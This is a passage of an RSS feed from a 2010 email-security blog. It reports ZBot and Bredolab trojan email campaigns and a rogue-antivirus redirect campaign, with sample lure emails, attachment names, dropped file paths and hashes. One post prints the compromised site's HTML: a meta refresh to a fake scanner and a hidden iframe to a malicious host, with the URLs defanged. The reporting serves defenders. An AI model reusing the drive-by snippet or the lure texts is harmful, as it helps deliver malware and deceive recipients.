<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1038/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1038/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1038/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1038/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1038/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1038/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1038/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1038/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1038/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1038/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1038/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1038/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1038/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1038/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1038&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/13/dhl-tracking-emails-are-back-with-new-trojan-variants/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>New ZBot trojan in the wild</title>
		<link>http://blog.mxlab.eu/2010/08/13/new-zbot-trojan-in-the-wild/</link>
		<comments>http://blog.mxlab.eu/2010/08/13/new-zbot-trojan-in-the-wild/#comments</comments>
		<pubDate>Fri, 13 Aug 2010 12:53:41 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[zbot]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1035</guid>
		<description><![CDATA[MX Lab intercepted a new ZBot trojan attached to emails with changing subjects and body content. The following email subjects are being used: Another candidate brought to you EBOD Meeting MEC Update Fw: New Taxes Coming Summary of payments The email body also changes with every new email version. Here are some examples: Enjoy&#8230; email [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1035&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a new ZBot trojan attached to emails with changing subjects and body content.</p>
<p>The following email subjects are being used:</p>
<p>Another candidate brought to you<br />
EBOD Meeting MEC Update<br />
Fw: New Taxes Coming<br />
Summary of payments</p>
<p>The email body also changes with every new email version. Here are some examples:</p>
<blockquote><p>Enjoy&#8230; email with questions.. have a great safe weekend&#8230; still need more letters&#8230; get it done!</p>
<p>In Unity!</p>
<p>Chauncey Pennington</p></blockquote>
<blockquote><p>knuts,</p>
<p>Attached are two files showing the amounts paid this past year.<br />
The files are in Lotus 1-2-3 but I think you can open these in Excel or the Open office spread sheet.<br />
This is working very nicely.</p>
<p>Bradley Jacobs</p></blockquote>
<blockquote><p>Hi,</p>
<p>This is Charles Brand working as a Technical Team Lead in IBM with over 10 years of solid mainframe development experience. I am confident that my skills will match for this requirement.</p>
<p>Please find the resume as a word attachment. I am available at 404-353-5442 for a discussion. BTW I am in EST time zone.</p>
<p>Looking forward to work with you.</p>
<p>Thanks<br />
Charles</p></blockquote>
<blockquote><p>I have attached part of that document toward the bottom so you can print it out for your friends.</p>
<p>&#8220;Excellence is an art won by training and habituation. We do not act rightly because we have virtue or excellence, but we rather have those because we have acted rightly. We are what we repeatedly do. Excellence, then, is not an act but a habit&#8221;  Aristotle</p></blockquote>
<p>Along with the subject and body content changes, the attached ZIP file also has different file names:</p>
<p>2010 MEC Update.zip<br />
2010 Financing.123.zip<br />
resume.zip<br />
six_months.zip</p>
<p>At the time of writing, only 4 of the 42 AV engines at Virus Total did detect the treath. Virus Total <a href="http://www.virustotal.com/file-scan/report.html?id=c17cdb67b545d0b1ba133081d1c426c34eab6874f3bce544b41cd41133ae39d5-1281708142" target="_blank">permlink</a> and MD5: 0f80c925e86d069e651eed8a4836f1be.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1035/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1035/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1035/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1035/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1035/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1035/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1035/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1035&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/13/new-zbot-trojan-in-the-wild/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>New Bredolab trojan in the wild</title>
		<link>http://blog.mxlab.eu/2010/08/13/new-bredolab-trojan-in-the-wild/</link>
		<comments>http://blog.mxlab.eu/2010/08/13/new-bredolab-trojan-in-the-wild/#comments</comments>
		<pubDate>Fri, 13 Aug 2010 01:09:58 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Bredolab]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1032</guid>
		<description><![CDATA[MX Lab intercepted a new Bredolab trojan attached to emails with changing subjects and body content. The following email subjects are being used: Beauty and the Geek 2 First Birthday Invitation fill this Passport form In USA on August 15 and 16 Resume &#38; Coverletter &#8211; Feedback Status Your reservation is confirmed &#8211; Ref: 12801/267373 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1032&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a new Bredolab trojan attached to emails with changing subjects and body content.</p>
<p>The following email subjects are being used:</p>
<p>Beauty and the Geek 2<br />
First Birthday Invitation<br />
fill this Passport form<br />
In USA on August 15 and 16<br />
Resume &amp; Coverletter &#8211; Feedback<br />
Status<br />
Your reservation is confirmed &#8211; Ref: 12801/267373</p>
<p>The email body also changes with every new email version. Here are some examples:</p>
<blockquote><p>Hi Joe,</p>
<p>I will be in USA on August 15, 16 and 17. I have a job interview on August 15 and available on August 16. I wonder if you and your partners will be available to catch up on any job prospect at your company.</p>
<p>I have attached my resume again with few changes.</p>
<p>Please let me know your availability. Thank you.</p>
<p>Best Regards,<br />
Salvatore</p></blockquote>
<blockquote><p>Hello,</p>
<p>Thank you for making a booking through Allhotels</p>
<p>This voucher confirms that you have paid $ 1,100.00 as a deposit for the cost of the rooms and services detailed below. The guest must present this voucher, along with photo identification matching the guest name on this voucher, to the hotel on check-in.</p>
<p>The hotel will also ask for a valid credit card on check-in. This is to cover incidental expenses like meals, drinks, laundry, etc. Guests are responsible for payment of all extra charges direct to the hotel.</p>
<p>Please find the details in the attachment.</p></blockquote>
<blockquote><p>Hello All,</p>
<p>Please treat this as my personal invitation , Grace the occasion with your presence and bless my elder brother’s daughter on her first birthday.</p>
<p>Date: Sunday, August 15</p>
<p>Please find the venue details in the attachment.</p>
<p>Thanks,<br />
Jordan Fish</p></blockquote>
<p>Along with the subject and body content changes, the attached ZIP file also has different file names:</p>
<p>Resume.zip<br />
invitation.zip</p>
<p>The attached ZIP archive is around  120 kB large, once extracted an .exe file is unpacked with the same name as the ZIP archive.</p>
<p>The trojan is known as Gen:Variant.Bredo.6 (Bitdefender), W32/Zbot.AN.test!Eldorado (F-Prot), W32/Trojan3.BXW (Authentium).</p>
<p>The following files will be created:</p>
<p>%Windir%\host32.exe<br />
%Windir%\jh87uhnoe3\ewf32.nls<br />
%Windir%\jh87uhnoe3\ewfrvbb.nls</p>
<p>The following directory will be created:</p>
<p>%Windir%\jh87uhnoe3</p>
<p>Several Windows registry modification are executed to the infected system.</p>
<p>At the time of writing, only 6 of the 42 AV engines at Virus Total did detect the treath. Virus Total <a href="http://www.virustotal.com/file-scan/report.html?id=090c58c522a81267f034cf89fcf5ef34c3a4756dc822fe0eefe41a0c5f06a3be-1281662274" target="_blank">permlink</a> and MD5: 4150a1deee2bb6852095627df34defb3.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1032/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1032/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1032/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1032/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1032/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1032/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1032/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1032/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1032/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1032/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1032/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1032/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1032/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1032/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1032&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/13/new-bredolab-trojan-in-the-wild/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>MX Lab group on LinkedIn</title>
		<link>http://blog.mxlab.eu/2010/08/13/mx-lab-group-on-linkedin/</link>
		<comments>http://blog.mxlab.eu/2010/08/13/mx-lab-group-on-linkedin/#comments</comments>
		<pubDate>Fri, 13 Aug 2010 00:46:39 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[MX Lab News]]></category>
		<category><![CDATA[MX Lab]]></category>
		<category><![CDATA[linkedin]]></category>
		<category><![CDATA[LinkedIn group]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1029</guid>
		<description><![CDATA[&#8220;Join the corporate group of MX Lab, provider of email security services like zero hour anti virus, managed anti spam and email archiving solutions. This group is open to everyone who is involved or interested in email security.&#8221; Join the MX Lab group on LinkedIn.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1029&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>&#8220;Join the corporate group of MX Lab, provider of email security services like zero hour anti virus, managed anti spam and email archiving solutions. This group is open to everyone who is involved or interested in email security.&#8221;</p>
<p><a href="http://www.linkedin.com/groupRegistration?gid=3304315" target="_blank">Join the MX Lab group on LinkedIn</a>.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1029/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1029/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1029/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1029/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1029/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1029/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1029/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1029/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1029/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1029/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1029/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1029/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1029/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1029/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1029&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/13/mx-lab-group-on-linkedin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Campaign with emails that lead to rogue AV software antivirus_24.exe continues</title>
		<link>http://blog.mxlab.eu/2010/08/10/campaign-with-emails-that-lead-to-rogue-av-software-antivirus_24-exe-continues/</link>
		<comments>http://blog.mxlab.eu/2010/08/10/campaign-with-emails-that-lead-to-rogue-av-software-antivirus_24-exe-continues/#comments</comments>
		<pubDate>Mon, 09 Aug 2010 23:11:23 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Viruses]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1020</guid>
		<description><![CDATA[MX Lab reported yesterday of emails where famous brands are used to lead users to a web site that hosts a malicious file antivurs_24.exe. Today, MX Lab intercepted even more of those emails leading to a web site hxxp://clinique-fuer-schoene-haut.de/x.html. This site has the following malicious code: PLEASE WAITING 4 SECOND... &#60;meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24"&#62; &#60;/head&#62;&#60;body&#62; &#60;iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10" [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1020&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab reported yesterday of emails where famous brands are used to lead users to a web site that hosts a malicious file antivurs_24.exe.</p>
<p>Today, MX Lab intercepted even more of those emails leading to a web site hxxp://clinique-fuer-schoene-haut.de/x.html. This site has the following malicious code:</p>
<pre>PLEASE WAITING 4 SECOND...
  &lt;meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24"&gt;
&lt;/head&gt;&lt;body&gt;

&lt;iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"&gt;&lt;/iframe&gt;

&lt;/body&gt;&lt;/html&gt;</pre>
<p>After 4 second syou will get redirected to hxxp://hoopdotami.cz.cc/scanner5/?afid=24.</p>
<p>The brands we intercepted are Ikea, Macys, Snapfish, Zappos, SurveySpot, XM, Focus Point Global and Very Best Baking. Here are some screens of the emails.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100810_antivirus_24.gif" alt="" width="450" height="656" /></p>
<p>More information regarding the treath can be found in the blog post <a href="http://blog.mxlab.eu/2010/08/07/malicious-emails-lead-to-rogue-av-software-antivirus_24-exe/">Malicious emails lead to rogue AV software antivirus_24.exe</a>.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1020/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1020&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/10/campaign-with-emails-that-lead-to-rogue-av-software-antivirus_24-exe-continues/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100810_antivirus_24.gif" medium="image" />
	</item>
	</channel>
</rss>